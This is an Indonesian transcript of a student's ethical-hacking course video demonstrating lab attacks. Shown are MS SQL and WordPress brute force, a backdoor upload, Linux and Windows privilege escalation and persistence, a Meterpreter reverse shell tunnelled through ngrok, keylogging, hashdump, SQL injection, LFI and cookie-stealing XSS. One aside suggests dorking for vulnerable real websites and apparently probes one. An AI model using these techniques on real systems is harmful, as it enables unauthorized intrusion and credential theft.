Baik, Assalamualaikum warahmatullahi wabarakatuh. Halo, nama saya Bayu Jumhari Cahyono Santoso, NIM 2301020001 dari mata kuliah Ethical Hacking dengan dosen Muhammad Azwar MKom. Dalam video ini saya akan mempresentasikan rangkuman dan praktik dari pertemuan 9 hingga 15. Saya akan menggunakan Kali Linux sebagai mesin penyerang dan beberapa target lab yang sudah saya siapkan. Baiklah, langsung kita mulai. Yang pertama, pada pertemuan 9, kita akan membahas eksploitasi layanan MS SQL dan Pivot Directory. Pertemuan 9 ini membahas eksploitasi layanan Microsoft SQL atau MS SQL adalah database server yang sering digunakan di lingkungan Windows. Miskonfigurasi umum yang membuat MS SQL rentan antara lain yang pertama, SA account atau sistem administrasi account itu aktif dengan password yang lemah. Kedua, fitur XP CMD Shell yang diaktifkan dan memungkinkan eksekusi perintah OS langsung dari query SQL. Dan yang ketiga, akses MS SQL yang tidak dibatasi oleh firewall. Saya akan mulai dengan scanning target di IP VPS. Cuman di sini saya menggunakan Docker. Sebentar. IP-nya map SVSC 1443 ini port MS SQL. Dan ini IP dari Docker saya. Script MS SQL info MS SQL config. Kita tunggu. Baik, di sini tertera bahwa portnya itu terbuka dengan number yang sudah tertera. Service pack levelnya juga tertera. Statusnya open di sini. Windows MS SQL Server 2019. Kemudian kita akan membuka MSV Console untuk melakukan brute force dan menggunakan modul MS SQL Login. MSV Console strip key. Sudah masuk, langsung use auxiliary scanner MS SQL login. Set host. Di sini host VPS atau Dockernya 172.20.0.40. Set username. Biasanya username MS SQL itu SA ya, atau sistem administrator, bisa admin, bisa dan lain-lain. Cuman di sini saya sudah set di labnya itu untuk SA saja username-nya. Kemudian kita menggunakan word list yang sudah kita buat sendiri. Nah, pwtxt. Kita set targetnya di 5 saja. Kemudian kita run. Oke, di sini sudah sukses login dengan username SA dan password SA@12345. Nah, jika sudah mendapatkan kredensial, sekarang saya akan login dan melakukan beberapa perintah. Kita akan login menggunakan impacket. Jadi di sini exit dulu. Kita sudah tahu username passwordnya. Kelamaan, ini tutup aja. Oke, impacket MS SQL client, username-nya SA titik 2, ini sebagai pembatas passwordnya, SA@12345 terus di sini VPS IP atau Docker IP-nya yang tadi 172.20.0.40, port 1443. Sebenarnya bisa dikosongin aja langsung, cuman
beberapa kan ada portnya beda gitu. Windows out dev null. Coba tanpa ini dah, langsung aja. Oke, sudah masuk. Di sini kita bisa menggunakan XP CMD shell untuk dir, create file dan lain-lain sebagainya. Cuman karena ini di Docker dan Dockernya itu di Mac, jadi XP CMD shell ini tidak support di Azure SQL. Untuk Edge ini limitasi karena kita pakai versi ARM 64. Fitur ini hanya ada di SQL Server Developer atau Enterprise gitu, dengan arsitektur x64 atau x86. Jadi kita pakai komen yang lain aja yang lebih sederhana. Contoh select add version. Oke, di sini kelihatan kan, select name from system database. Nah, kelihatan juga nih. Terus select bintang from lab db dbo users untuk lihat usersnya. Oh, nggak ada. Oke, ini saja untuk pertemuan 9. Sebenarnya kita bisa melakukan pivot directory apabila MS SQL-nya itu ada di Windows Server gitu. Cuman untuk Mac ini tidak ada versi ARM. Jadi mau nggak mau kita install Docker di sini. Baik, sekarang kita lanjut ke pertemuan 10, eksploitasi miskonfigurasi layanan CMS terbuka. Pertemuan 10 akan membahas eksploitasi miskonfigurasi pada CMS atau Content Management System seperti WordPress. Sering ditemukan rentan karena satu, admin panel yang terbuka dan dapat diakses publik, dan kedua, penggunaan credential default seperti admin atau admin, username admin, dan password admin maksud saya. Terus yang ketiga, plugin atau tema yang outdated dan memiliki vulnerability. Dan yang keempat, directory listing yang enable sehingga struktur file terekspos. Baik, kita langsung saja buka. Saya sudah siapkan web sendiri. Nah, ini dia. Kita akan melakukan enumerasi username-nya terlebih dahulu. Kita buka terminal. Kita akan menggunakan wp scan. URL localhost 8081 enumerate u. Salah komen. Nah. Di sini kelihatan WordPress version, temanya, pluginnya, sampai list update-nya juga kelihatan. Oke, di sini user identified admin UBG. Jadi di sini terdeteksi bahwa username dari website ini adalah admin UBG. Cara gampangnya juga kita langsung ke webnya, kita tulis author 1 kayak gini. Tanda tanya author sama dengan 1. Nah, kelihatan langsung kan di sini. Nggak perlu ribet pakai wp scan gitu. Langsung saja kita akan melakukan brute forcing. Balik lagi ke terminal. Kita akan menggunakan wp scan juga. URL. Di sini username. Tadi kan sudah kelihatan admin UBG. Terus password. Kita akan menggunakan password list sendiri. Aduh, salah ini lagi. Usernames.
langsung. Ini juga salah. Nah, oh kurang S. Oke, udah jalan. Kita tinggal nunggu. Di sini valid combination found. Username admin UBG, password admin 123. Kita langsung masuk. Biasanya loginnya di WP login PHP. Admin UBG, admin 123. Setelah masuk, apa yang kita lakukan? Kita bisa langsung mengupload file backdoor. Saya nggak bisa bagi file backdoornya, kalian bisa cari sendiri. Ini kita install dan sukses. Kita tinggal akses saja backdoornya. Dengan backdoor ini kita bisa melakukan root server, kita bisa melakukan dump database dan lain sebagainya. Nah, kita sudah masuk ke webnya. Ini indeksnya juga kelihatan. Ini bisa diganti sesuka hati. Baik, untuk pertemuan 10 itu saja. Kemudian kita lanjut ke pertemuan 11. Siklus penuh post exploitation Linux. Pertemuan 11 akan membahas post exploitation pada Linux. Post exploitation adalah fase setelah kita berhasil mendapatkan akses ke target. Jadi username passwordnya kita udah tahu. Tahapannya meliputi enumerasi sistem, privilege escalation ke root, persisten agar akses tetap ada, dan exfiltration data sensitif dan covering tracks. Cuman kayaknya saya nggak bisa jelasin semuanya di sini karena kalau upload di YouTube ini jelas bakalan kehapus atau ke banned gitu. Oke, kita langsung jalan saja. Di sini saya sudah contoh, kita sudah mendapatkan aksesnya. Pentest @localhost. Pentest ini usernya ya, @localhost itu IP atau domain yang targetnya, port 2222. Nah, di sini kita sudah masuk tuh ke target Linux. Ini saya buat sendiri juga. Langkah pertama kita enumerasi sistem, contohnya UMI, ID di sini kelihatan. Terus uname A kelihatan juga di sini. Terus cat etc password kelihatan, psaux proses yang berjalan kelihatan, netstat belum ada kayaknya ini. Coba cat prop version kelihatan juga, ifconfig sini kelihatan IP-nya. Belum ada, nggak diinstal juga ifconfig. Ini enumerasi sistem biasa lah. Terus kita lanjut ke step berikutnya aja. Kita langsung melakukan privilege escalation. Coba Pythonnya install nggak? Oke, install. Kita langsung Python 3 C import OS set UID 0 OS system bin bash. Oh, ini kurang ini. Nah, udah berhasil kan? Ini kita berhasil masuk ke root ini. ID coba. Tunggu. Kita jadi root. Kita bakal menemukan find no password. Sudo find exec bin bash strip quit. Oh, nggak ada jadinya.
Coba sudo nmap. Nggak ada juga. Coba echo bass. Kayaknya privilege escalation hanya ini saja. Cuman kalau kita mau persisten atau kita mau pertahanin aksesnya ke VPS atau SSH ini, kita harus membuat user baru gitu. Contohnya user add ms bin bash backdoor. Oh, user backdoor udah ada di sini. Echo backdoor back 123. Kita bakal tambahkan SSH authorized key. Mcdir p root SSH keygen t rsa min b 2048 min f tmp backdoor key /n. Oke, sudah. Cat tmp backdoor. Coba cek harusnya ada ini. Root SSH authorize. chmod 600 root SSH authorize key. Kita akan buat cron tab di sini, bisa apa enggak? Nggak bisa emang. Tapi intinya di sini kita udah buat username, kita udah add juga, dan suatu saat kita akan login, kita bisa menggunakan username dan password yang sudah kita buat. Oke, lanjut ke pertemuan 12, post exploitation dan privilege escalation Windows. Pertemuan 12 adalah project pentesting Windows. Post exploitation di Windows melibatkan mendapatkan MetaPredator session, enumerasi sistem Windows, privilege escalation menggunakan teknik seperti always install elevated, unquote service path, atau token impersonation, kemudian persistent dan hashdump. Oke, sama seperti Linux, saya sudah memiliki akses awal ke Windows, entah itu dari backdooring dengan Metasploit atau sebagainya. Cuman di sini saya akan gunakan Metasploit dengan modul exploit untuk mendapatkan MetaPredator-nya. Kita lanjut ke MSV console strip key.
Sebelumnya kita perlu ngrok ya untuk melakukan forwarding. Kita use exploit multi handler. Kemudian kita menggunakan payload Windows nge-lag lagi x64 Meterpreter reversi TCP. Kemudian set lhost. Di sini bisa diisi 127, diisi localhost atau intinya lokal. Contoh 000. Cek di sini kita forwarding ke port mana. Kalau di sini 444, kita set lport 4444 juga. Set exit on session false. Kemudian kita masuk ke sini, kita jalanin lagi MSV console. Kita menggunakan exploit Windows SMB PSEC set rhost. Karena di sini saya tidak bisa menginstal Windows di MacBook, jadi saya menggunakan server asli yang saya buat sendiri. Ini IP-nya. IP-nya 95.133.236.14. Set SMB user administrator. Set SMB password admin 1234. Ini kita ceritanya sudah dapat aksesnya gitu. Aduh, salah lagi. SMB pass. Terus set lhost. Nah, lhost di sini baru pakai yang dari ngrok. Nggak bisa. Lah, nggak bisa di copy nih. Nah, set lport di sini pakai 13202. Kemudian kita run. Seharusnya berhasil masuk ya. Ini kita pakai live server ini, bukan server lokal. Tunggu, emang agak lama di sini. Oke, exploit complete but no session was created. Jadi di sini kita akan masuk ke backdoornya lewat terminal yang satunya. Kita cek session min L, no active session. Coba. Bentar, kok nggak ada ya? Coba jobs. Bukan. Oh, kita belum run, lupa, astaga. Kita running dulu. Nah, baru sudah. Coba kita ulang ini. Kita run ulang. Oke, di sini udah sending ya, sending stage. Meterpreter session 1 close. Coba, kita nggak tahu ini kenapa ke close ini. Cuman di stop aja. Kita cek session, coba min L, no active session. Coba exploit J. Kita coba buat ulang ya. Kayaknya ada kesalahan.
Windows x64 interpreter versi TCP, set lhost 0000, set lport 4444, set exit on session device run J. Coba nih kita run dulu. Ini terus kita run juga. Coba kita buka RDP-nya. Oke, ternyata servernya mati, jadinya nggak bisa ke connect, tapi udah saya aktifkan lagi. Coba kita run lagi. Oh, di sini run J, run -J. Oke, Meterpreter session 4 opened. Jadi udah terbuka, ada sesi ID 4. Coba kita cek sessions -L. Ada ID 4 di sini. Tipenya Meterpreter Windows. Informationnya juga tersedia di sini. Kita coba masuk sessions -I, ID-nya 4. Oke, kita sudah berhasil berinteraksi dengan server yang kita targetkan. Kita coba melakukan SSH info. Kita melakukan Meterpreter post exploitation. Nah, di sini kelihatan nih. Nama komputernya personal server. Jadi sesuai ya sama di sini sistem name-nya personal server. OS-nya Windows Server 2019. Build 17763. Arsitekturnya x64. Kemudian kita coba get UID. Server username-nya ini. Coba get PID. Ada proses. Oh, kita current PID-nya 1856. Coba kita list prosesnya, kita lihat proses apa aja yang berjalan. Aduh, nggak bisa ini lagi. Oke, di sini ada Mozilla yang berjalan, server manager. Ini saja yang berjalan, tidak ada yang spesial. Kita juga bisa melakukan screenshot di sini. Screenshot. Tapi nggak ada desktop yang available untuk di screenshot di sini. Coba kita bisa melakukan keylogger juga. Keyscan start. Coba saya tes dulu ya. Saya masuk ke sistemnya dulu. Ini RDP servernya nggak bisa diakses ini. Saya harus login lewat VNC jadi. Oke, coba tes. Oh, face.com. Ini kelok apa enggak ini? Oke, scan dan oh, enggak ke scan apa gimana? Coba
bisa mungkin. Kita stop aja case scan-nya. Ini juga kalau mau enumerasi lebih lanjut kita bisa run post windows getter enum system. Oh ya, tapi kita harus pakai exploit ini. Coba kita get system. Untuk privilege escalation kita udah already running as system. Kita cek always install elevator-nya. Coba shell. Oke, bisa masuk. Kita berhasil masuk ke CMD ya di sini. Dir. Nah, banyak banget tuh. Coba cd users dir cd administrator. Kita bakal cek di VNC apakah di crypt juga apa enggak. Dir cd desktop dir. Oke, filenya ini aja ya, Firefox setup. Coba kita cek. Kita bakal buat file di sini. Oke, ini isinya cuman ini aja ya. Coba echo tes, bisa nggak echo-nya? Oke, bisa. Echo hacked by, contoh hacked txt. Nah, muncul nih kan di servernya. Kita buka. Nah, dan beneran. Oke, itu aja kalau privilege escalation sampai step berikutnya kayak hashdump dan credential dumping itu kurang bisa karena YouTube membatasi hal itu. Sebenarnya gampang gitu, tinggal hashdump. Kita exit dulu dari sini. Hashdump. Nah, ini kan kelihatan nih usernya. Lihat user, admin, administrator. Untuk dump SAM-nya. Security Account Manager, SAM. Tinggal step 7 kita buat persisten di Windows dan kita bisa membuat user baru di sini. Cuman lewat shell sih bisa sih langsung. Net users. Ada ini aja, net user administrator. Kita bisa ganti passwordnya di sini. Admin 1337 contohnya. Nah, langsung keganti tuh. Kita tinggal login sebagai admin 1337 aja di sana. Untuk create user juga gampang, net user administrator. Contoh Bayu 1337. Aduh, lupa lagi komennya. Bayu 137. Coba. Oh ya, gini komennya. Net users. Itu kan muncul Bayu di sini. Tinggal net local group administrators Bayu add. Udah, ini jadi admin ini. Kemudian untuk pertemuan ke-12 ya, ini ke-12 sampai sini aja. Kita close. Kita lanjut ke pertemuan 13, web app, LFI, fuzzing, dan SQLI. Buka. Nah, ini DVWA. Di pertemuan 13 kita akan membahas 3 teknik dasar web application pen testing. Beberapa diantaranya ada LFI atau local file inclusion, ada fuzzing untuk directory discovery, dan SQL injection. Target saya adalah DVWA, Damn Vulnerable Web Application. Sebenarnya gampang kalau mau cari target di Google ini. Web India paling banyak. Blog details, PHP ID, tinggal tambahin site in. Ini pasti full nih. Coba tes.
Tuh kan? Ini udah full ini. Cuman kita nggak akan pakai ini. Oke, kita kasih SQL injection. Atau mulai dari ini deh. Kita fuzzing directory dulu deh. Buka terminal baru. Ini udah nggak dibutuhin nih. Ini kita pakai GoBuster. min u http localhost 8080, terus wordlistnya user share wordlist. Ini udah bawaan dari apa, Kali Linux, directory list 2.3 medium. Nah, aduh, oh ya udah dah, kayak gini juga bisa. Sebenarnya harus di set thread-nya sama ekstensi apa aja yang mau dicek. Cuman biar seluruhnya kita bisa lihat kayak gini. Nah, ini kan kelihatan nih. Ini kalau mau ngecek ekstensi apa yang mau di fuzzing. X, PHP, HTML, TXT, bar. Terus thread-nya di sini pakai 50 aja. Nah, kan kelihatan tuh ekstensinya. Ada index, about, security, txt, login, ada setup PHP kelihatan, ada config juga. Ini scan-nya lumayan lama, jadi saya stop di sini aja. Jadi itu aja untuk fuzzing directory. Kita lanjut ke SQL injection. Kita nggak usah pakai SQL map di sini. Kita tes, oke, error. Ini tinggal order by, coba 10. Oke, error. Order by 5 coba, error. Order by 3, error. Order by 2, nggak error. Berarti ada 2 kolom di sini. Entah 2 kolom apa 2 field ya, nggak tahu saya. Union select 1, 2. Terus di belakang ID ini tambahin strip. Muncul angka ajaib sini, ada 1, ada 2. Di sini coba kita print nih. Coba concat add version. Oke, muncul 10.6.27 MariaDB. Coba hostname. Nggak salah, harus pakai add hostname ini. Nah, ini kelihatan. Coba user dvwa add IP-nya, database-nya apa namanya, dvwa. Ini bisa sampai dump user password, cuman di UTS saya nggak bisa. Saya sebenarnya udah buat, cuman langsung dihapus sama YouTube gitu. Nyampe sini aja. Terus kita lanjut ke LFI, file inclusion. Ini coba kita tes untuk membaca etc password. Nah, ini kelihatan nih etc passwordnya nih. Coba etc host. Jadi local file inclusion itu kayak kamu manggil file include atau file config tapi dengan security yang rendah gitu. Jadi malah kebablasan bisa manggil file apa aja di sini. Coba proc self environment. Oh, nggak bisa. Permission denied. Tapi cuman itu aja sih kalau LFI, karena nggak terlalu ini sih, nggak terlalu high risk menurut saya. Walaupun menurut orang-orang LFI high risk, cuman nggak se-high risk dari SQL. Terus kita lanjut ke pertemuan 14 LFI lanjutan, masih di sini jadinya.
Di LFI lanjutan ini kita bisa melakukan PHP wrapper gitu. Baca source code dalam base 64 maksudnya. Contoh coba PHP filter convert. Nah, base 64 encode resource etc password. Nah, di sini kan ada nih muncul base 64 nih. Coba besarin. Nah, ini coba di copy, buka terminal, kita bakal decode isinya apa ini. Echo nih, base 64 D. Oh, jadi isinya ini nih, etc passwordnya. Terus coba di sini etc host muncul juga di sini. Kita coba untuk decode lagi. Echo base 64 D. Jadi isinya ini nih. Itu aja. Cuman di sini banyak yang bisa kita lakuin. Contoh XSS, store, reflected. Coba tes Bayu. Ini kalau diganti jadi script alert X. Nah, ini kan ini reflected nih. Coba ganti dokumen domain. Nggak bisa. Nah, localhost dokumen cookie. Nah, kelihatan nih PHP session ID-nya nih. Security-nya kelihatan. Oke, itu saja di pertemuan 14 ini. Pertemuan 15 hanya evaluasi dan penjelasan project pentesting. Pertama, mari kita rangkum apa saja yang sudah kita demonstrasikan. Di pertemuan 9 kita berhasil mengeksploitasi MS SQL Server yang salah dikonfigurasi untuk mendapatkan command execution via XP CMD Cell. Kedua, di pertemuan 10 kita mengeksploitasi WordPress dengan credential default dan mendapatkan akses penuh ke admin panel CMS. Ketiga, di pertemuan 11 kita menjalankan siklus post exploitation di Linux dari initial access, privilege escalation via SUID, dan sampai persistence. Keempat, di pertemuan 12 kita melakukan post exploitation di Windows dengan mendapatkan Meterpreter, privilege escalation, dan hashdown. Kelima dan keenam, di pertemuan 13 dan 14 kita melakukan web app pentesting, fuzzing directory, SQL injection dan LFI dasar, LFI lanjutan, PHP wrappers. Kemudian kesimpulan dari semua ini adalah sebagian besar kerentanan yang kita demonstrasikan bisa dicegah dengan penggunaan password yang kuat, patch management yang rutin, validasi input di aplikasi web, dan konfigurasi service yang benar sesuai best practice. Ethical hacking mengajarkan kita cara berpikir seperti attacker, bukan untuk menyerang sistem orang lain, tapi untuk lebih baik dalam mempertahankannya. Sekian video uas saya, terima kasih dan wassalamualaikum warahmatullahi wabarakatuh.